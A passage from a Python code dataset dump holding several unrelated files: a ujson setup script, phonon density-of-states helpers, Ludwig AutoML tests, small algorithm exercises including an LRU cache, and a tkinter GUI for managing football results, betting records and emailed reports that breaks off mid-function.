IntegerField('threshold')\n type = SelectField('type')\n behavior = SelectField('behavior')\n description = SelectField('description')\n\nclass ExecTaskForm(Form):\n time = DateTimeField(u'time' ,format='%H:%M')\n datetime = DateTimeField(u'datetime' ,format='%Y-%m-%d %H:%M')\n type = SelectField('type')","sub_path":"skynet/app/modules/main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115619863","text":"\"\"\"\nCopyright (c) 2011-2012, ESN Social Software AB and Jonas Tarnstrom\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n * 
Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n * Neither the name of the ESN Social Software AB nor the\n names of its contributors may be used to endorse or promote products\n derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL ESN SOCIAL SOFTWARE AB OR JONAS TARNSTROM BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nPortions of code from:\nMODP_ASCII - Ascii transformations (upper/lower, etc)\nhttp://code.google.com/p/stringencoders/\nCopyright (c) 2007 Nick Galbreath -- nickg [at] modp [dot] com. All rights reserved.\n\"\"\"\n\nfrom distutils.core import setup, Extension\nimport distutils.sysconfig\nimport shutil\nimport os.path\nimport re\n\nCLASSIFIERS = filter(None, map(str.strip,\n\"\"\"\nDevelopment Status :: 5 - Production/Stable\nIntended Audience :: Developers\nLicense :: OSI Approved :: BSD License\nProgramming Language :: C\nProgramming Language :: Python :: 2.4\nProgramming Language :: Python :: 2.5\nProgramming Language :: Python :: 2.6\nProgramming Language :: Python :: 2.7\n\"\"\".splitlines()))\n\ntry:\n\tshutil.rmtree(\"./build\")\nexcept(OSError):\n\tpass\n\nmodule1 = Extension('ujson',\n sources = ['./python/ujson.c', './python/objToJSON.c', './python/JSONtoObj.c', './lib/ultrajsonenc.c', './lib/ultrajsondec.c'],\n include_dirs = ['./python', './lib'])\n\ndef get_version():\n\tfilename = os.path.join(os.path.dirname(__file__), './python/version.h')\n\tfile = None\n\ttry:\n\t\tfile = open(filename)\n\t\theader = file.read()\n\tfinally:\n\t\tif file:\n\t\t\tfile.close()\n\tm = re.search(r'#define\\s+UJSON_VERSION\\s+\"(\\d+\\.\\d+(?:\\.\\d+)?)\"', header)\n\tassert m, \"version.h must contain UJSON_VERSION macro\"\n\treturn m.group(1)\n\nsetup (name = 'ujson',\n version = get_version(),\n description = \"Ultra fast JSON encoder and decoder for Python\",\n ext_modules = [module1],\n author=\"Jonas Tarnstrom\",\n author_email=\"jonas.tarnstrom@esn.me\",\n download_url=\"http://github.com/esnme/ultrajson\",\n license=\"BSD License\",\n platforms=['any'],\t \n\t url=\"http://www.esn.me\",\n classifiers=CLASSIFIERS,\n\t )","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"584237465","text":"import numpy as np\n\ndef get_dos_iws(iws):\n \"\"\"Calculate DOS with IWs.\n Parameter\n ----------\n iws : ndarray, float, shape=(((nqpoints, nfreq, nmodes)))\n nqpoints : integer\n # of q-points\n nfreq : integer\n # of frequencies\n nmodes : integer\n # of modes\n\n Return\n ----------\n dos : array, float, shape=(nfreq,)\n\n \"\"\"\n nfreq = len(iws[0])\n dos = np.zeros(nfreq)\n for ifreq in 
range(nfreq):\n dos[ifreq] = np.sum(iws[:,ifreq,:])\n return dos\n\ndef cal_dos_f2(thm, weights, freqs=None, f2s=None):\n \"\"\"Calculator of DOS from integration weights\n Parameters\n ---------------\n freqs : array, float, shape=(nfreq)\n thm : TetrahedronMethod\n See descriptions in Phonopy in detail\n weights : array, float, shape=(nqpoints,)\n Weight of each q-points\n Type is float, but in fact, integer.\n \n nfreq : integer\n = len(freqs)\n nqpoints : integer\n # of q-points\n \n Return\n ---------\n dos : array, float, shape=(ndiv,)\n Calculated DOS\n \"\"\"\n if f2s is None:\n if freqs is not None:\n f2s = freqs**2\n else:\n print(\"Error: input a list of frequencies.\")\n import sys\n sys.exit()\n thm.set(value='I', frequency_points=f2s)\n dos = np.zeros_like(f2s)\n for iq, iw in enumerate(thm):\n dos += np.sum(iw * weights[iq], axis=1)\n \n return dos\n \ndef get_dos_green(g0, multiplicity=None):\n \"\"\"Calculate phonon DOS using Green's function at a given frequency\n Parameters\n ------------\n g0 : ndarray, complex, shape=((3*natoms, 3*natoms))\n Green's function of the pure crystal\n #nat_prim : integer\n # # of atoms in the primitive cell\n \"\"\"\n if multiplicity is None:\n multi_long = np.ones(len(g0))\n else:\n if 3*len(multiplicity) != len(g0):\n print(\"Error {:d} != {:d}\".format(\n 3*len(multiplicity),\n len(g0)))\n import sys\n sys.exit()\n \n multi_long = np.zeros(len(g0))\n for i in range(len(multiplicity)):\n multi_long[3*i:3*(i+1)] = multiplicity[i] * np.ones(3)\n dos = (np.sum(np.diag(np.imag(g0))/multi_long) / np.pi)\n return dos\n\n\n","sub_path":"pyscat/calc/dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645419296","text":"import os\nimport tempfile\nfrom typing import Any, Dict, List, Set\nfrom unittest import mock\n\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom ludwig.api import LudwigModel\nfrom ludwig.constants import COLUMN, INPUT_FEATURES, NAME, OUTPUT_FEATURES, PREPROCESSING, SPLIT, TRAINER, TYPE\nfrom tests.integration_tests.utils import category_feature, generate_data, number_feature\n\ntry:\n import dask.dataframe as dd\n\n from ludwig.automl.automl import create_auto_config, train_with_config\n from ludwig.hyperopt.execution import RayTuneExecutor\nexcept ImportError:\n pass\n\n\n@pytest.fixture(scope=\"module\")\ndef test_data():\n with tempfile.TemporaryDirectory() as tmpdir:\n input_features = [\n number_feature(),\n number_feature(),\n category_feature(encoder={\"vocab_size\": 3}),\n category_feature(encoder={\"vocab_size\": 3}),\n ]\n output_features = [category_feature(decoder={\"vocab_size\": 3})]\n dataset_csv = generate_data(\n input_features, output_features, os.path.join(tmpdir, \"dataset.csv\"), num_examples=100\n )\n yield input_features, output_features, dataset_csv\n\n\n@pytest.mark.distributed\n@pytest.mark.parametrize(\"tune_for_memory\", [True, False])\ndef test_create_auto_config(tune_for_memory, test_data, ray_cluster_2cpu):\n input_features, output_features, dataset_csv = test_data\n targets = [feature[NAME] for feature in output_features]\n df = dd.read_csv(dataset_csv)\n config = create_auto_config(df, targets, time_limit_s=600, tune_for_memory=tune_for_memory, backend=\"ray\")\n\n def to_name_set(features: List[Dict[str, Any]]) -> Set[str]:\n return {feature[NAME] for feature in features}\n\n assert to_name_set(config[INPUT_FEATURES]) == to_name_set(input_features)\n assert 
to_name_set(config[OUTPUT_FEATURES]) == to_name_set(output_features)\n\n\ndef _get_sample_df(class_probs):\n nrows = 1000\n thresholds = np.cumsum((class_probs * nrows).astype(int))\n\n df = pd.DataFrame(np.random.randint(0, 100, size=(nrows, 3)), columns=[\"A\", \"B\", \"C\"])\n\n def get_category(v):\n if v < thresholds[0]:\n return 0\n if thresholds[0] <= v < thresholds[1]:\n return 1\n return 2\n\n df[\"category\"] = df.index.map(get_category).astype(np.int8)\n return df\n\n\n@pytest.mark.distributed\ndef test_autoconfig_preprocessing_balanced():\n df = _get_sample_df(np.array([0.33, 0.33, 0.34]))\n\n config = create_auto_config(dataset=df, target=\"category\", time_limit_s=1, tune_for_memory=False)\n\n assert PREPROCESSING not in config\n\n\n@pytest.mark.distributed\ndef test_autoconfig_preprocessing_imbalanced():\n df = _get_sample_df(np.array([0.6, 0.2, 0.2]))\n\n config = create_auto_config(dataset=df, target=\"category\", time_limit_s=1, tune_for_memory=False)\n\n assert PREPROCESSING in config\n assert SPLIT in config[PREPROCESSING]\n assert config[PREPROCESSING][SPLIT] == {TYPE: \"stratify\", COLUMN: \"category\"}\n\n\n@pytest.mark.distributed\n@pytest.mark.parametrize(\"time_budget\", [200, 1], ids=[\"high\", \"low\"])\ndef test_train_with_config(time_budget, test_data, ray_cluster_2cpu, tmpdir):\n input_features, output_features, dataset_csv = test_data\n config = {\n \"input_features\": input_features,\n \"output_features\": output_features,\n \"trainer\": {\"epochs\": 2},\n \"hyperopt\": {\n \"search_alg\": {\n \"type\": \"hyperopt\",\n \"random_state_seed\": 42,\n },\n \"executor\": {\n \"type\": \"ray\",\n \"time_budget_s\": time_budget,\n \"cpu_resources_per_trial\": 1,\n \"scheduler\": {\n \"type\": \"async_hyperband\",\n \"max_t\": time_budget,\n \"time_attr\": \"time_total_s\",\n \"grace_period\": min(72, time_budget),\n \"reduction_factor\": 5,\n },\n },\n \"parameters\": {\n \"trainer.batch_size\": {\n \"space\": \"choice\",\n \"categories\": [64, 128, 256],\n },\n \"trainer.learning_rate\": {\n \"space\": \"loguniform\",\n \"lower\": 0.001,\n \"upper\": 0.1,\n },\n },\n },\n }\n\n fn = RayTuneExecutor._evaluate_best_model\n with mock.patch(\"ludwig.hyperopt.execution.RayTuneExecutor._evaluate_best_model\") as mock_fn:\n # We need to check that _evaluate_best_model is called when the time_budget is low\n # as this code path should be triggered when the trial was early stopped\n mock_fn.side_effect = fn\n\n outdir = os.path.join(tmpdir, \"output\")\n results = train_with_config(dataset_csv, config, output_directory=outdir)\n best_model = results.best_model\n\n if time_budget > 1:\n assert isinstance(best_model, LudwigModel)\n assert best_model.config[TRAINER][\"early_stop\"] == -1\n assert mock_fn.call_count == 0\n else:\n assert best_model is None\n assert mock_fn.call_count > 0\n","sub_path":"tests/integration_tests/test_automl.py","file_name":"test_automl.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"246997475","text":"class Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n r = {}\n res = []\n for n in nums:\n if n not in r:\n r[n] = 1\n else:\n r[n] += 1\n r = sorted(r.items(),key=lambda x:x[1],reverse=True)\n for i in range(k):\n res.append(r[i][0])\n# print(res)\n return res","sub_path":"347. Top K Frequent Elements.py","file_name":"347. 
Top K Frequent Elements.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"525140010","text":"# type: ignore\nimport sys\n\n_old_hook = sys.excepthook\n\n# I don't want to be sued by MS so I'll use a single 'p'\nclipy = \"\"\"\n _-_ | /\n/_ \\\\ |/\n(o)(o)\n| | |\n| \\\\/ /\n\\\\ |\n ¯--¯\"\"\"\n\n\ndef assistant_print(type_, value, tb):\n    _old_hook(type_, value, tb)\n    width = len(f\"{type_.__qualname__}{f': {value}' if value else ''}\")-2\n    print(f\"\\\\{'_'*width}/\" + clipy)\n\n\n\nsys.excepthook = assistant_print\n","sub_path":"coding_assistant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"168041477","text":"class Node:\n    def __init__(self, value=None):\n        self.value = value\n        self.next = None  # a missing link is None, not the int 0\n\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n        self.tail = None\n        self.length = 0\n\n    def push(self, value):\n        newNode = Node(value)\n        if self.head is None:\n            self.head = newNode\n            self.tail = self.head\n        else:\n            self.tail.next = newNode\n            self.tail = newNode\n        self.length += 1\n\n    def remove_first(self):\n        newHead = self.head.next\n        self.head = newHead\n        self.length -= 1\n\n    def remove_last(self):\n        current = self.head\n        newtail = current\n        while current.next:\n            newtail = current\n            current = current.next\n        self.tail = newtail\n        self.tail.next = None\n        self.length -= 1\n        return current.value\n\n    def getNode(self, index):\n        count = 0\n        head = self.head\n        while index != count:\n            head = head.next\n            count += 1\n        return head\n\n    def remove(self, index):\n        if index == 0:\n            return self.remove_first()\n        if index == self.length-1:\n            return self.remove_last()\n        prevNode = self.getNode(index-1)\n        removeNode = prevNode.next\n        prevNode.next = removeNode.next\n        self.length -= 1\n\n    def print_chain(self):\n        arr = []\n        head = self.head\n        while head:\n            arr.append(head.value)\n            head = head.next\n\n        return arr\n\n\nll = LinkedList()\nll.push(2)\nll.push(3)\nll.push(4)\nll.push(5)\nll.remove(0)\nprint(ll.print_chain())\n\n\nclass LRU_Cache(object):\n\n    def __init__(self, capacity):\n        # Initialize class variables\n        self.list = LinkedList()\n        self.data = {}\n        self.capacity = capacity\n\n    def get(self, key):\n        # Retrieve item from provided key. Return -1 if nonexistent.\n        # Explicit None check so falsy values such as 0 are still returned.\n        val = self.data.get(key)\n        if val is not None:\n            return val\n        else:\n            return -1\n\n    def set(self, key, value):\n        # Set the value if the key is not present in the cache.\n        # If the cache is at capacity remove the oldest item.\n        if key in self.data:\n            return\n        if self.capacity == self.list.length:\n            # Evict the oldest entry (the list head); the previous version removed\n            # the tail, i.e. the newest entry, which is not LRU behaviour.\n            remove_key = self.list.head.value\n            self.list.remove_first()\n            del self.data[remove_key]\n\n        self.list.push(key)\n        self.data[key] = value\n\n\nour_cache = LRU_Cache(5)\n\nour_cache.set(1, 1)\nour_cache.set(2, 2)\nprint(our_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(3)) # returns -1\n\n#Test Cases\n\nour_cache.set(3, 3)\nour_cache.set(4, 4)\nour_cache.set(5, 5)\nour_cache.set(6, 6)\n\n\nprint(our_cache.get(4)) # returns 4\nprint(our_cache.get(5)) # returns 5\nprint(our_cache.get(6)) # returns 6; key 1, the oldest entry, was evicted\n","sub_path":"P1_SHOW_ME_DATA_STRUCTURES/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"303680498","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkcalendar import DateEntry\r\nfrom PIL import Image, ImageTk\r\nimport psycopg2\r\nimport class_SQL\r\nimport datetime\r\nfrom dateutil import parser\r\nfrom tkinter import messagebox\r\nimport threading\r\nimport import_results\r\nimport stats\r\nimport reporting\r\nimport pandas as pd\r\nimport historical_data\r\n\r\n\r\nclass class_gestionnaire(object):\r\n    \"\"\"création de l'interface graphique à plusieurs pages\"\"\"\r\n    def __init__(self,fenetre):\r\n\r\n        #instancie la classe pgsql\r\n        self.cl = class_SQL.class_SQL()\r\n        self.cl_report = reporting.rapport()\r\n        #création de la fenetre tk\r\n        self.master = fenetre\r\n        #création de la barre de menu\r\n        self.menubar = tk.Menu(self.master)\r\n        #onglet importation des paris\r\n        self.menubar.add_command(label = \"Importation des résultats\", command=self.page_import_resultats)\r\n        #onglet statistiques\r\n        self.menubar.add_command(label = \"Statistiques\", command = self.page_calcul_stats)\r\n        #onglet importation des paris\r\n        self.menubar.add_command(label = \"Importation des paris\", command = self.page_importation_paris)\r\n        #onglet envoie email\r\n        self.menubar.add_command(label = \"Envoi mail\", command = self.page_gestion_mail)\r\n\r\n        #active la page importation des resultats\r\n        self.page_import_resultats()\r\n\r\n        #ajout de la barre de menu à la fenetre\r\n        self.master.config(menu=self.menubar)\r\n\r\n    def __del__(self):\r\n        \"\"\"détruit la classe \"\"\"\r\n        del self.cl\r\n        del self.cl_report\r\n\r\n    def destruction_fenetre(self):\r\n        \"\"\"destruction des widgets de la fenetre \"\"\"\r\n        for w in self.master.winfo_children():\r\n            if str(w) != '.!menu':\r\n                w.destroy()\r\n    def desactive_menubar(self,onglet):\r\n        \"\"\"désactive le menubar sauf les onglets indiqués\"\"\"\r\n        for c in range(1,self.menubar.index(tk.END)+1):\r\n            self.menubar.entryconfig(c,state='disabled')\r\n        #active le menubar indiqué\r\n        if onglet != 'ALL':\r\n            self.menubar.entryconfig(onglet,state='normal')\r\n    def active_menubar(self,onglet):\r\n        \"\"\"active le menubar sauf les onglets indiqués\"\"\"\r\n        for c in range(1,self.menubar.index(tk.END)+1):\r\n            self.menubar.entryconfig(c,state='normal')\r\n        #désactive le menubar indiqué\r\n        if onglet != 'ALL':\r\n            self.menubar.entryconfig(onglet,state='disabled')\r\n\r\n    def page_statistiques(self):\r\n        \"\"\"calcul des stats pour POWER BI\"\"\"\r\n        #supprime les widgets de la fenetre\r\n        self.destruction_fenetre()\r\n\r\n        #active le menubar sauf Ampère\r\n        self.active_menubar(\"Statistiques\")\r\n        self.boutonStats = tk.Button(self.master,text= 'lance 
statistiques')\r\n self.boutonStats.config(width = 20,height = 3, command = lambda: self.thread_parallele(self.calcul_stats))\r\n self.boutonStats.pack()\r\n\r\n def calcul_stats(self):\r\n \"\"\"calcul les statistiques \"\"\"\r\n try:\r\n stats.stats()\r\n messagebox.showinfo('Succès', 'Statistiques calculées')\r\n except Exception as e:\r\n messagebox.showerror('Erreur',str(e))\r\n\r\n\r\n def page_gestion_mail(self):\r\n \"\"\"création de la page pour envoyer les mail\"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n #active le menubar sauf Ampère\r\n self.active_menubar(\"Envoi mail\")\r\n #cadre pour la date\r\n self.cadredate = tk.Frame(self.master)\r\n self.cadredate.grid(row=1, column=1, padx=10,pady=10)\r\n #label date debut\r\n self.Label_date_debut = tk.Label(self.cadredate,text=\"Date début\")\r\n self.Label_date_debut.pack()\r\n #date debut\r\n self.date_debut = DateEntry(self.cadredate, width=20, background='orange',\r\n foreground='white', borderwidth=2,justify='center',year=2018, month=8, day=1)\r\n self.date_debut.pack(padx=10, pady=10)\r\n #label date fin\r\n self.Label_date_fin = tk.Label(self.cadredate,text=\"Date fin\")\r\n self.Label_date_fin.pack()\r\n #date fin\r\n self.date_fin = DateEntry(self.cadredate, width=20, background='orange',\r\n foreground='white', borderwidth=2,justify='center')\r\n self.date_fin.pack(padx=10, pady=10)\r\n\r\n #Création des widgets\r\n self.creation_widgets()\r\n\r\n var = tk.IntVar()\r\n \r\n #bouton pour envoyer le mail ou non\r\n self.check_mail = tk.Checkbutton(self.master, text=\"Envoi mail\", variable = var)\r\n self.check_mail.grid(row=4, column=1, padx=10,pady=10)\r\n\r\n\r\n #Bouton de lancement de la procédure\r\n self.bouton_lancement('Création des rapports')\r\n self.boutonLance.config(width = 20,height = 3, command = lambda: self.thread_parallele(self.creation_rapport(self.listeDroite.get(0,tk.END),self.date_debut.get_date(),self.date_fin.get_date(),var.get())))\r\n \r\n #Création de la listBox de gauche\r\n self.listeGauche.bind(\"\",self.ajoute_item_Gauche_Droite)\r\n #Création de la listBox de droite\r\n self.listeDroite.bind(\"\",self.ajoute_item_Droite_Gauche)\r\n #liste des portefeuilles dans la base pilote ampère\r\n self.liste_pers = self.liste_personne()\r\n \r\n #ajoute les fonds à la listBox de gauche\r\n self.ajoute_item_liste_droite(self.liste_pers)\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche.config(command = lambda: self.ajoute_item_liste_gauche(self.liste_pers))\r\n #association du spin bouton à une fonction\r\n self.SpinDroit.config(command = lambda: self.ajoute_item_liste_droite(self.liste_pers))\r\n\r\n\r\n def creation_rapport(self,liste_personne,date_debut,date_fin,envoi_mail):\r\n \"\"\"création des reporting et envoi de l'email\"\"\"\r\n\r\n #désactive les widgets\r\n self.activate_desactivate('disabled')\r\n\r\n liste_code = []\r\n date_d = pd.Timestamp(date_debut)\r\n date_f = pd.Timestamp(date_fin)\r\n #boucle sur les personnes\r\n for x in liste_personne:\r\n #ajoute le code dans une liste\r\n pos = x.find('-') +2\r\n liste_code.append(x[pos:len(x)])\r\n #création du reporting\r\n try:\r\n self.cl_report.gestion_rapport_platypus(date_d,date_f,liste_code,envoi_mail)\r\n messagebox.showinfo('Succès', 'Reporting créé avec succès')\r\n except Exception as e:\r\n messagebox.showerror('Erreur', str(e))\r\n\r\n #désactive les widgets\r\n self.activate_desactivate('normal')\r\n\r\n def page_calcul_stats(self):\r\n \"\"\"création de la page 
statistiques\"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n \r\n #active le menubar sauf Ampère\r\n self.active_menubar(\"Statistiques\")\r\n\r\n\r\n #Création des widgets\r\n self.creation_widgets()\r\n self.creation_widgets_2()\r\n #Bouton de lancement de la procédure\r\n self.bouton_lancement('Calcul statistiques')\r\n self.boutonLance.config(width = 20,height = 3, command = lambda: self.thread_parallele(self.calcul_stats_2))\r\n \r\n #Création de la listBox de gauche champ\r\n self.listeGauche.bind(\"\",self.ajoute_item_Gauche_Droite)\r\n #Création de la listBox de droite champ\r\n self.listeDroite.bind(\"\",self.ajoute_item_Droite_Gauche)\r\n #Création de la listBox de gauche saison\r\n self.listeGauche_2.bind(\"\",self.ajoute_item_Gauche_Droite_2)\r\n #Création de la listBox de droite saison\r\n self.listeDroite_2.bind(\"\",self.ajoute_item_Droite_Gauche_2)\r\n #liste des portefeuilles dans la base pilote ampère\r\n self.liste_championnat = self.liste_champ()\r\n #liste des saisons dans la base résultats\r\n self.liste_sais = self.liste_saison()\r\n \r\n #ajoute les championnats à la listBox de gauche\r\n self.ajoute_item_liste_gauche(self.liste_championnat)\r\n #ajoute les championnats à la listBox de gauche\r\n self.ajoute_item_liste_gauche_2(self.liste_sais)\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche.config(command = lambda: self.ajoute_item_liste_gauche(self.liste_championnat))\r\n #association du spin bouton à une fonction\r\n self.SpinDroit.config(command = lambda: self.ajoute_item_liste_droite(self.liste_championnat))\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche_2.config(command = lambda: self.ajoute_item_liste_gauche_2(self.liste_sais))\r\n #association du spin bouton à une fonction\r\n self.SpinDroit_2.config(command = lambda: self.ajoute_item_liste_droite_2(self.liste_sais))\r\n\r\n\r\n def page_import_resultats(self):\r\n \"\"\"Création de la page ampère \"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n \r\n #active le menubar sauf importation des resultats\r\n self.active_menubar(\"Importation des résultats\")\r\n\r\n\r\n #cadre pour la saison\r\n self.cadresaison = tk.Frame(self.master)\r\n self.cadresaison.grid(row=1, column=1, padx=10,pady=10)\r\n #Label pour chosir la date\r\n self.Label_saison = tk.Label(self.cadresaison,text=\"Saison\")\r\n self.Label_saison.pack()\r\n #textBox pour la date\r\n self.TextBox_saison = tk.Entry(self.cadresaison,justify='center')\r\n self.TextBox_saison.pack(padx=10, pady=10)\r\n self.TextBox_saison.insert(0, \"1920\")\r\n\r\n #Création des widgets\r\n self.creation_widgets()\r\n\r\n #Bouton de lancement de la procédure\r\n self.bouton_lancement('importation des résulats')\r\n self.boutonLance.config(width = 20,height = 2, command = lambda: self.thread_parallele(self.ajoute_resultats))\r\n \r\n #Création de la listBox de gauche\r\n self.listeGauche.bind(\"\",self.ajoute_item_Gauche_Droite)\r\n #Création de la listBox de droite\r\n self.listeDroite.bind(\"\",self.ajoute_item_Droite_Gauche)\r\n #liste des portefeuilles dans la base pilote ampère\r\n self.liste_championnat = self.liste_champ()\r\n \r\n #ajoute les fonds à la listBox de gauche\r\n self.ajoute_item_liste_droite(self.liste_championnat)\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche.config(command = lambda: self.ajoute_item_liste_gauche(self.liste_championnat))\r\n #association du spin bouton à une fonction\r\n 
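# (added note) like SpinGauche just above, but this handler reloads the full championship list into the right-hand (selected) listbox\r\n        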
self.SpinDroit.config(command = lambda: self.ajoute_item_liste_droite(self.liste_championnat))\r\n\r\n def bouton_lancement(self, libelle):\r\n \"\"\"création du bouton de lancement\"\"\"\r\n #bouton de lancement du programme\r\n self.boutonLance = tk.Button(self.master,text= libelle)\r\n self.boutonLance.grid(row=5, column=1, padx=10,pady=10)\r\n\r\n\r\n def update_team(self,code,date_ref,HT_AT,combobox,saison = None, div = None):\r\n \"\"\"liste des equipes dans le championnat et la saison\"\"\"\r\n\r\n #si division est vide\r\n if div == '':\r\n div = None\r\n #si saison est vide\r\n if saison == '':\r\n saison = None\r\n\r\n liste = self.cl.liste_team(code,date_ref,HT_AT,saison =saison,div =div)\r\n combobox['values'] = liste\r\n\r\n\r\n def update_saison(self,code,date_ref,div = None):\r\n \"\"\"liste des saisons en fonction de la division\"\"\"\r\n #si lal division est vide\r\n if div == '':\r\n div = None\r\n liste = self.cl.liste_saison(code, date_ref,div)\r\n self.choixSaison['values'] = liste\r\n\r\n def ajout_paris(self):\r\n \"\"\"ajoute un paris dans la base\"\"\"\r\n #si on a pas misé sur l'equipe domicile\r\n if self.miseHT.get() == '':\r\n miseHT = 'Null'\r\n else:\r\n miseHT = self.miseHT.get()\r\n #si on a pas misé sur l'equipe exterieure\r\n if self.miseAT.get() == '':\r\n miseAT = 'Null'\r\n else:\r\n miseAT = self.miseAT.get()\r\n\r\n\r\n\r\n result = self.cl.insert_mise(self.codeFonds.get(),self.choixSaison.get(),\r\n self.choixDiv.get(),self.Site.get(),\r\n self.choixHT.get(),self.choixAT.get(),\r\n miseHT,miseAT,\r\n self.Odd.get(),self.typeparis.get(),\r\n self.dateParis.get())\r\n if result == 'succès':\r\n messagebox.showinfo('Succès', 'Paris inséré avec succès dans la base')\r\n else:\r\n messagebox.showerror('Erreur', str(result))\r\n\r\n def calcul_vl(self):\r\n \"\"\"calcul les vl \"\"\"\r\n result = historical_data.calcul_vl()\r\n if result == 'succès':\r\n messagebox.showinfo('Succès', 'Vls calculées avec succès')\r\n else:\r\n messagebox.showerror('Erreur', str(result))\r\n\r\n\r\n def page_importation_paris(self):\r\n \"\"\"création de la page Reporting de gestion \"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n #active le menubar sauf Fichier de transparisation\r\n self.active_menubar(\"Importation des paris\")\r\n\r\n #code du fonds\r\n code = '000001'\r\n #aujourd'hui\r\n date_ref = datetime.datetime.today()\r\n #liste des divisions\r\n liste_division = self.cl.liste_division(code,date_ref)\r\n\r\n #label site\r\n self.labelSite = ttk.Label(self.master, text='Site',width = 20)\r\n self.labelSite.grid(row=0, column=0,padx=0,pady=0)\r\n #entry site\r\n self.Site = ttk.Entry(self.master, width = 20)\r\n self.Site.grid(row=1, column=0, padx=5,pady=5)\r\n\r\n\r\n #label code fonds\r\n self.labelcodeFonds = ttk.Label(self.master, text='Code fonds',width = 20)\r\n self.labelcodeFonds.grid(row=0, column=4,padx=0,pady=0)\r\n #entry division\r\n self.codeFonds = ttk.Entry(self.master, width = 20)\r\n self.codeFonds.grid(row=1, column=4, padx=5,pady=5)\r\n self.codeFonds.insert(tk.END,code)\r\n\r\n\r\n #label division\r\n self.labelDiv = ttk.Label(self.master, text='Choix de la division',width = 20)\r\n self.labelDiv.grid(row=0, column=2,padx=0,pady=0)\r\n #combobox choix de la div\r\n self.choixDiv = ttk.Combobox(self.master, width = 20,values = liste_division)\r\n self.choixDiv.grid(row=1, column=2, padx=5,pady=5)\r\n\r\n #label saison\r\n self.labelSaison = ttk.Label(self.master, text='Choix de la saison',width = 20)\r\n 
self.labelSaison.grid(row=2, column=2,padx=0,pady=0)\r\n #combobox choix de la saison\r\n self.choixSaison = ttk.Combobox(self.master, width = 20,\r\n postcommand = lambda:self.update_saison(code,date_ref,self.choixDiv.get()))\r\n self.choixSaison.grid(row=3, column=2, padx=5,pady=5)\r\n\r\n\r\n\r\n #label HomeTeam\r\n self.labelHT = ttk.Label(self.master, text='Equipe domicile',width = 20)\r\n self.labelHT.grid(row=3, column=0,padx=0,pady=0)\r\n #combobox HT\r\n self.choixHT = ttk.Combobox(self.master, postcommand = lambda : self.update_team(\r\n code,date_ref,\"HomeTeam\",self.choixHT,\r\n saison=self.choixSaison.get(),div=self.choixDiv.get()))\r\n self.choixHT.grid(row=4, column=0,padx=5,pady=5)\r\n\r\n #label mise HT\r\n self.labelMiseHT = ttk.Label(self.master, text=\"Mise Equipe domicile\",width = 20)\r\n self.labelMiseHT.grid(row=3, column=1,padx=0,pady=0)\r\n #entry mise HT\r\n self.miseHT= ttk.Entry(self.master)\r\n self.miseHT.grid(row=4, column=1,padx=5,pady=5)\r\n\r\n\r\n #label AwayTeam\r\n self.labelAT = ttk.Label(self.master, text=\"Equipe extérieure\",width = 20)\r\n self.labelAT.grid(row=3, column=3,padx=0,pady=0)\r\n #combobox AT\r\n self.choixAT = ttk.Combobox(self.master, postcommand = lambda : self.update_team(\r\n code,date_ref,\"AwayTeam\",self.choixAT,\r\n saison=self.choixSaison.get(),div=self.choixDiv.get()))\r\n self.choixAT.grid(row=4, column=3,padx=5,pady=5)\r\n\r\n #label mise AT\r\n self.labelMiseAT = ttk.Label(self.master, text=\"Mise Equipe extérieure\",width = 